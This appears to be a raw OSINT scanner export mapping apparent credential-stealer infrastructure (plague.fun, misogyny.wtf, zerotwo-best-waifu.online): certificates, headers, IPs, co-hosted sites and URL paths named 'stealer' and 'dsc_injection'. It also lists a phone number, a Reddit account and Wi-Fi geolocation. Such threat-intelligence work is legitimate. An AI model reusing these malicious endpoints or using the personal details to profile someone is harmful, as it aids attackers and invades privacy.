Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA384 30:66:02:31:00:97:56:75:a4:ab:85:b3:50:ed:46:db:3a:1f: bb:75:b0:f2:57:84:4c:bf:f2:9d:c2:5b:2b:9a:9c:e1:50:bc: ca:4c:3a:37:50:3f:91:2b:f1:3d:3b:c7:20:19:52:08:b1:02: 31:00:eb:3f:e4:2f:4c:57:97:77:3f:dd:d6:ab:3b:c1:ef:85: 47:a0:a6:99:62:c9:31:7b:f5:c6:c6:03:dc:f8:80:fc:da:81: 41:e5:0b:5f:ff:ad:15:77:95:f9:67:83:36:5f plague.fun 2022-12-18 00:21:34 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b0ef6cacfce28b-ORD Content-Encoding: gzip 104.21.19.243 2022-12-18 00:03:12 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 04:50:42:ff:9a:7a:0a:ec:db:51:55:79:18:dd:8f:ed:52:b0 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Jan 8 17:50:30 2022 GMT Not After : Apr 8 17:50:29 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:ac:b0:17:a9:7b:51:da:31:7f:8f:00:19:b7:3b: 98:64:90:41:83:01:ae:da:c8:aa:ac:d4:17:62:2b: f9:44:4e:05:5a:c8:20:ef:dc:a2:f3:45:78:3a:ed: af:b0:2e:06:e9:62:bd:f4:43:71:b4:d3:b3:eb:3a: 9b:77:69:ad:57:fc:60:7d:16:9c:b5:f7:25:94:e1: 
d6:18:0a:b4:34:e5:56:64:cc:e2:54:4f:50:e0:38: 81:9d:d7:46:81:ca:56:b5:53:ad:f7:4c:ec:d0:48: 14:8e:09:3d:e6:af:c3:a5:c9:12:3c:1d:64:d4:9c: c3:59:ad:d4:5a:90:12:14:ee:34:d6:07:da:98:71: 90:50:14:13:80:f5:4a:58:eb:3a:b7:cf:cc:11:3d: 17:0b:fd:11:95:39:4c:00:a7:3e:c8:28:36:88:a4: 5a:c3:63:19:a5:30:8d:fb:f6:75:72:a1:28:62:08: ad:b5:a6:ec:e6:7c:06:10:f1:0e:9d:91:27:6a:1f: 94:91:88:4b:5b:e5:39:a6:d1:08:1c:fe:26:bf:6d: 75:5a:be:c5:92:fe:2c:75:45:5f:45:87:11:0e:32: 54:cc:4c:c8:27:b5:05:6f:bc:c5:7b:a3:f9:a5:6e: eb:b2:1c:a1:62:b9:c5:09:cd:81:eb:42:27:b7:b3: 09:af Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 5A:40:9D:CB:29:61:19:0B:49:48:24:70:A0:AC:F1:60:B9:77:E4:E6 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 29:79:BE:F0:9E:39:39:21:F0:56:73:9F:63:A5:77:E5: BE:57:7D:9C:60:0A:F8:F9:4D:5D:26:5C:25:5D:C7:84 Timestamp : Jan 8 18:50:31.079 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:8A:ED:1F:02:55:07:04:9B:33:8A:18: 9E:EC:35:86:59:0D:51:53:39:C3:BB:CC:BA:B4:73:87: 9B:09:AF:10:EC:02:20:0C:21:C1:58:B9:D7:D0:11:02: 53:1B:55:34:76:64:E6:F0:77:DB:72:E8:17:F2:55:75: EA:77:35:10:C3:E9:2B Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77: 15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13 Timestamp : Jan 8 18:50:31.428 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 
30:44:02:20:4B:56:BC:EE:D0:F8:1A:2B:3F:80:F9:7E: 97:8D:72:37:04:9C:3B:A1:90:56:11:BD:DA:1A:00:5D: 17:6A:21:7E:02:20:58:96:51:0D:94:2E:16:50:61:E8: 7C:92:97:45:2D:D9:92:71:00:CA:64:D8:4C:49:D5:01: 9B:CC:4E:EA:8D:9D Signature Algorithm: sha256WithRSAEncryption 2c:00:7d:72:58:4f:d1:2f:6c:10:e5:f1:b0:20:f7:03:55:a0: 76:08:e4:be:c1:4d:8c:a9:01:c3:9c:31:29:8b:67:61:92:af: 7f:01:a7:98:77:9d:41:9b:c6:6a:a7:d4:87:b0:c6:2a:6e:b2: 93:a8:59:22:29:14:c8:c4:1c:b8:85:56:bd:a3:04:4a:a6:7c: 5a:3d:fc:76:55:4e:2b:05:58:c7:a6:e2:8c:25:27:c5:b2:a4: 7b:2e:58:c7:6b:bd:23:e1:30:bb:5e:18:f7:82:24:69:da:f7: 95:a3:a6:2a:18:55:00:b9:54:08:f8:d3:d5:35:2f:98:a2:7c: 0d:a4:4b:12:9b:8b:6a:31:87:72:1f:09:83:a3:3a:33:8f:a6: 6b:ce:27:fc:0e:38:13:77:f9:79:f9:ca:d2:f2:0f:36:2b:c8: 23:28:38:4b:eb:8e:db:6e:b9:36:48:d9:d5:08:13:77:19:4d: 06:ca:4f:72:22:42:f3:bd:35:78:01:0f:a6:cd:3a:29:b4:49: fc:8e:2c:32:32:50:12:1e:81:b8:2a:d7:c7:63:63:29:25:9d: df:b3:65:87:1a:15:13:5b:e4:c1:12:a9:c6:3e:65:5a:18:83: 7d:88:88:ec:8d:41:62:f3:f5:77:5e:7c:ab:2e:48:36:b7:b7: 13:e4:41:b3 2022-12-18 00:22:07 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Connection": "DISPLAY_UTF8"}, "Connection": ["close"]} 34.149.204.188 2022-12-18 00:14:56 HTTP Status Code No Web Spider 0 0 2 0 None None https://zerotwo-best-waifu.online/778112985743251/wap/shatlegay/stealer123365 2022-12-18 00:09:49 Co-Hosted Site No HackerTarget 0 0 2 0 None banadislifo.tk 172.67.147.230 2022-12-18 00:03:24 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None 178.204.149.34.bc.googleusercontent.com 34.149.204.178 2022-12-18 00:08:41 Internet Name No DNS Resolver 0 0 2 0 None misogyny.wtf Certificate: Data: Version: 3 (0x2) Serial Number: 04:d6:9e:d2:88:e9:c1:89:74:28:65:2d:6e:88:09:50:9f:4f Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Jul 23 20:47:28 2022 GMT Not After : Oct 21 20:47:27 2022 GMT Subject: CN=*.misogyny.wtf Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 
bit) pub: 04:e2:0d:a7:a1:bf:81:84:fe:a2:ff:8d:36:67:3d: 94:76:0b:74:ea:c9:c4:15:da:67:48:de:38:52:f4: 66:f1:cf:58:f5:ed:3b:fb:e6:93:95:6d:62:df:c4: e1:a5:f5:b7:4f:c3:28:52:2d:05:bb:ed:9b:1c:5a: e7:bc:37:9b:b8 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 4E:89:67:D2:CE:A1:37:68:F8:76:14:2C:47:E7:EC:A8:A1:05:92:71 X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.misogyny.wtf, DNS:misogyny.wtf X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 46:A5:55:EB:75:FA:91:20:30:B5:A2:89:69:F4:F3:7D: 11:2C:41:74:BE:FD:49:B8:85:AB:F2:FC:70:FE:6D:47 Timestamp : Jul 23 21:47:28.797 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:20:4A:E4:98:06:90:A2:26:39:BD:A3:6A:4D: A5:7D:F1:92:76:73:72:56:74:3A:35:52:D7:FB:31:D9: 74:05:08:1E:02:21:00:B0:93:6A:A9:62:11:5A:40:39: 2B:5D:8F:F2:B0:49:8D:C2:25:5A:18:EB:A8:30:DD:03: 35:2A:7E:D3:F4:F2:67 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : DF:A5:5E:AB:68:82:4F:1F:6C:AD:EE:B8:5F:4E:3E:5A: EA:CD:A2:12:A4:6A:5E:8E:3B:12:C0:20:44:5C:2A:73 Timestamp : Jul 23 21:47:29.288 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:82:A5:33:2A:58:8B:8C:1F:9F:4B:6D: 4A:2F:12:2D:E3:FE:A7:28:F4:C0:8C:35:19:EC:8B:9F: F0:53:88:42:EC:02:20:31:C6:4A:90:78:BA:FC:46:8F: 35:C5:3B:CC:8D:A4:F3:45:0A:18:35:06:B6:5C:3F:AF: B0:B5:53:71:1D:FD:1F Signature Algorithm: ecdsa-with-SHA384 30:65:02:30:51:f5:5e:96:72:85:74:e1:c8:1d:1f:3a:76:ec: 
30:30:1f:6a:a3:b9:3a:48:71:6e:7a:89:26:a4:97:e8:4f:fa: a6:31:65:eb:9b:94:68:7e:a3:b7:a5:f6:3a:44:2c:10:02:31: 00:b4:9c:3b:57:ea:e2:4a:ff:81:b6:e2:50:9c:33:11:2c:aa: 54:8b:cc:88:19:a0:e7:80:27:26:fa:4c:bc:51:32:0e:23:00: d6:39:a6:58:a5:d6:7a:f2:0b:9e:18:35:75 2022-12-18 00:21:30 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b19748df8a61c8-ORD Content-Encoding: gzip 172.67.190.129 2022-12-18 00:08:45 Internet Name No DNS Resolver 0 0 2 0 None zerotwo-best-waifu.online www.zerotwo-best-waifu.online 2022-12-18 00:10:03 Internet Name - Unresolved No URLScan.io 0 0 1 0 None wasp.plague.fun plague.fun 2022-12-18 00:21:17 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Server: cloudflare Date: Content-Type: text/html Content-Length: 151 Connection: keep-alive CF-RAY: 77b0cd4c299e2d49-ORD 188.114.96.1 2022-12-18 00:22:14 Netblock Membership No Censys 0 0 2 0 None 172.67.160.0/20 172.67.169.215 2022-12-18 00:09:12 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.1:8443 188.114.96.0/24 2022-12-18 00:09:29 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.9:80 188.114.96.0/24 2022-12-18 00:18:29 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.12:8443 188.114.97.0/24 2022-12-18 00:21:58 Software Used Yes Censys 0 0 2 0 None CloudFlare CloudFlare Load Balancer 2a06:98c1:3120::1 2022-12-18 00:25:19 Physical Location No MetaDefender 0 0 2 0 None San Jose, United States 104.21.28.240 2022-12-18 00:10:04 Raw Data from RIRs No URLScan.io 0 0 1 0 None [{u'sort': [1670411037724, u'b8459fd2-83fd-4e66-8ab8-cc2bb30aa35b'], u'task': {u'domain': u'misogyny.wtf', u'uuid': u'b8459fd2-83fd-4e66-8ab8-cc2bb30aa35b', 
u'url': u'https://misogyny.wtf/inject/UsRjS959Rqm4sPG4', u'visibility': u'public', u'time': u'2022-12-07T11:03:57.724Z', u'apexDomain': u'misogyny.wtf', u'method': u'manual'}, u'stats': {u'uniqIPs': 0, u'uniqCountries': 0, u'requests': 0, u'dataLength': 0}, u'screenshot': u'https://urlscan.io/screenshots/b8459fd2-83fd-4e66-8ab8-cc2bb30aa35b.png', u'result': u'https://urlscan.io/api/v1/result/b8459fd2-83fd-4e66-8ab8-cc2bb30aa35b/', u'_id': u'b8459fd2-83fd-4e66-8ab8-cc2bb30aa35b', u'page': {u'url': u'https://misogyny.wtf/inject/UsRjS959Rqm4sPG4', u'domain': u'misogyny.wtf'}}, {u'sort': [1670410880241, u'f08f98fb-5092-4d00-be93-204263cf5847'], u'task': {u'domain': u'misogyny.wtf', u'uuid': u'f08f98fb-5092-4d00-be93-204263cf5847', u'url': u'https://misogyny.wtf/', u'visibility': u'public', u'time': u'2022-12-07T11:01:20.241Z', u'apexDomain': u'misogyny.wtf', u'method': u'manual'}, u'stats': {u'uniqIPs': 0, u'uniqCountries': 0, u'requests': 0, u'dataLength': 0}, u'screenshot': u'https://urlscan.io/screenshots/f08f98fb-5092-4d00-be93-204263cf5847.png', u'result': u'https://urlscan.io/api/v1/result/f08f98fb-5092-4d00-be93-204263cf5847/', u'_id': u'f08f98fb-5092-4d00-be93-204263cf5847', u'page': {u'url': u'https://misogyny.wtf/', u'domain': u'misogyny.wtf'}}, {u'sort': [1670344471737, u'f83c1f25-0fe2-4b77-81e1-0c361dbbb86a'], u'task': {u'domain': u'misogyny.wtf', u'uuid': u'f83c1f25-0fe2-4b77-81e1-0c361dbbb86a', u'tags': [u'falconsandbox'], u'url': u'http://misogyny.wtf:2020/parser', u'visibility': u'public', u'time': u'2022-12-06T16:34:31.737Z', u'apexDomain': u'misogyny.wtf', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 4674, u'requests': 3, u'dataLength': 3630}, u'screenshot': u'https://urlscan.io/screenshots/f83c1f25-0fe2-4b77-81e1-0c361dbbb86a.png', u'result': u'https://urlscan.io/api/v1/result/f83c1f25-0fe2-4b77-81e1-0c361dbbb86a/', u'_id': u'f83c1f25-0fe2-4b77-81e1-0c361dbbb86a', u'page': {u'mimeType': u'text/html', 
(remainder of urlscan.io raw result dump omitted) | misogyny.wtf
2022-12-18 00:23:00 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | amen.fr | 81.88.48.102
2022-12-18 00:09:19 | Physical Location | No | LeakIX | 0 | 0 | 2 | 0 | None | United States | 172.67.137.37
2022-12-18 00:16:46 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | spottedelectroniclibrary.0300fllas.repl.co | 34.149.204.188
2022-12-18 00:09:54 | Hosting Provider | No | Hosting Provider Identifier | 0 | 0 | 2 | 0 | None | Cloudflare Inc: https://www.cloudflare.com/ | 104.21.28.240
2022-12-18 00:03:07 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 34.149.204.189 | 34.149.204.188
2022-12-18 00:06:15 | Web Content | No | Web Spider | 1 | 0 | 1 | 0 | None | https://discord.gg/uD2nwtBvbP | misogyny.wtf
2022-12-18 00:21:17 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden Server: cloudflare Date: Content-Type: text/html Content-Length: 151 Connection: keep-alive CF-RAY: 77b2bb53bf092c54-ORD | 188.114.96.1
2022-12-18 00:16:46 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | movil.pacificow.repl.co | 34.149.204.188
2022-12-18 00:21:11 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | (Net ID: 00:02:2D:00:21:01) | 37.780462,-122.390564
2022-12-18 00:05:16 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Reddit (Category: social) https://www.reddit.com/user/rasputain | rasputain
2022-12-18 00:15:36 | HTTP Status Code | No | Web Spider | 0 | 0 | 2 | 0 | None | None | https://zerotwo-best-waifu.online/778112985743251/wap/dsc_injection
2022-12-18 00:07:17 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html; charset=UTF-8 | http://misogyny.wtf:2020/parser
2022-12-18 00:03:05 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 34.149.204.178 | 34.149.204.188
2022-12-18 00:16:46 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | daviseguridad.wwwcomm.repl.co | 34.149.204.188
2022-12-18 00:26:05 | Physical Location | No | MetaDefender | 0 | 0 | 2 | 0 | None | San Jose, United States | 104.21.19.243
2022-12-18 00:08:15 | Netblock Membership | No | RIPE | 1 | 0 | 1 | 0 | None | 51.103.0.0/16 | 51.103.210.236
2022-12-18 00:18:19 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.7:8080 | 188.114.97.0/24
2022-12-18 00:07:18 | HTTP Status Code | No | Web Spider | 0 | 0 | 3 | 0 | None | 404 | http://misogyny.wtf/parser
2022-12-18 00:09:54 | Hosting Provider | No | Hosting Provider Identifier | 0 | 0 | 2 | 0 | None | Cloudflare Inc: https://www.cloudflare.com/ | 172.67.147.230
2022-12-18 00:20:56 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77b2699e2c678114-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 2606:4700:3031::ac43:93e6
2022-12-18 00:11:27 | Raw Data from RIRs | No | GLEIF | 0 | 0 | 3 | 0 | None | [{u'attributes': {u'highlighting': u'C/O CENTRALNIC LTD', u'value': u'C/O CENTRALNIC LTD'}, u'type': u'autocompletions'}] | (c) CentralNic Ltd
2022-12-18 00:21:09 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77ad78074edf230b-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.96.0
2022-12-18 00:12:05 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | Italy | (WHOIS record for WEBAPPS.NET omitted)
2022-12-18 00:21:20 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:8880 | 188.114.97.1
2022-12-18 00:32:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 4 | 0 | None | 195.110.124.154:53 | 195.110.124.0/24
2022-12-18 00:04:12 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | cdnjs.cloudflare.com | 188.114.97.1
2022-12-18 00:02:52 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | (raw X.509 certificate for *.plague.fun omitted) | plague.fun
2022-12-18 00:05:13 | Linked URL - Internal | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | http://misogyny.wtf:2020/parser | 20.226.83.185
2022-12-18 00:33:16 | Malicious Affiliate IP Address | Yes | VirusTotal | 0 | 0 | 3 | 0 | None | VirusTotal [81.88.52.226] https://www.virustotal.com/en/ip-address/81.88.52.226/information/ | 81.88.52.226
2022-12-18 00:08:56 | Physical Location | No | LeakIX | 0 | 0 | 2 | 0 | None | Amsterdam, North Holland, Netherlands | 188.114.96.0
2022-12-18 00:08:29 | Netblock Membership | No | RIPE | 1 | 0 | 2 | 0 | None | 172.67.128.0/20 | 172.67.137.37
2022-12-18 00:12:17 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | (raw Hybrid Analysis report for http://188.114.96.3:2052/j.ad omitted) | 188.114.96.3
2022-12-18 00:09:31 | Co-Hosted Site | No | HackerTarget | 0 | 0 | 2 | 0 | None | calpehuturgaza.ml | 104.21.28.240
2022-12-18 00:21:11 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | herron-libson (Net ID: 00:01:24:F1:75:B2) | 37.780462,-122.390564
2022-12-18 00:16:59 | Web Content | No | Web Spider | 0 | 0 | 4 | 0 | None | (stylesheet contents omitted) | http://webmail.zerotwo-best-waifu.online/css/qbert_theme/template/custom.css?v=1.7.0
2022-12-18 00:21:51 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77ac9cee6f082931-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.137.37
2022-12-18 00:16:34 | Physical Location | No | numverify | 0 | 0 | 3 | 0 | None | Ponchatoul, US | +19854014545
2022-12-18 00:22:07 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 34.149.204.188:443 | 34.149.204.188
2022-12-18 00:06:45 | Similar Domain | Yes | TLD Searcher | 1 | 0 | 1 | 0 | None | plague.eu | plague.fun
2022-12-18 00:16:26 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | 188.114.96.3:443 | 188.114.96.3
2022-12-18 00:10:03 | Linked URL - Internal | No | URLScan.io | 1 | 0 | 1 | 0 | None | http://wasp.plague.fun/inject/PDS1ays5XQVjXMk3 | plague.fun
2022-12-18 00:06:13 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | (raw Hybrid Analysis report for https://uuuytttt89999.57f7f7cff7f7f.repl.co/ omitted)
rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: uuuytttt89999.57f7f7cff7f7f.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /assets/css/normalize.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: uuuytttt89999.57f7f7cff7f7f.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /assets/css/normalize.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: uuuytttt89999.57f7f7cff7f7f.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /assets/images/i.png HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: uuuytttt89999.57f7f7cff7f7f.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /assets/images/i.png HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: uuuytttt89999.57f7f7cff7f7f.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /css2?family=Roboto:wght@100;400;500;700;900&display=swap HTTP/1.1\nAccept: text/css, */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: fonts.googleapis.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /css2?family=Roboto:wght@100;400;500;700;900&display=swap HTTP/1.1\nAccept: text/css, */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; 
rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: fonts.googleapis.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /s/roboto/v30/KFOlCnqEu92Fr1MmWUlvAA.woff HTTP/1.1\nAccept: */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://uuuytttt89999.57f7f7cff7f7f.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /s/roboto/v30/KFOlCnqEu92Fr1MmWUlvAA.woff HTTP/1.1\nAccept: */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://uuuytttt89999.57f7f7cff7f7f.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /s/roboto/v30/KFOkCnqEu92Fr1MmgWxM.woff HTTP/1.1\nAccept: */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://uuuytttt89999.57f7f7cff7f7f.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /s/roboto/v30/KFOkCnqEu92Fr1MmgWxM.woff HTTP/1.1\nAccept: */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://uuuytttt89999.57f7f7cff7f7f.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /s/roboto/v30/KFOmCnqEu92Fr1Me5g.woff HTTP/1.1\nAccept: */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: 
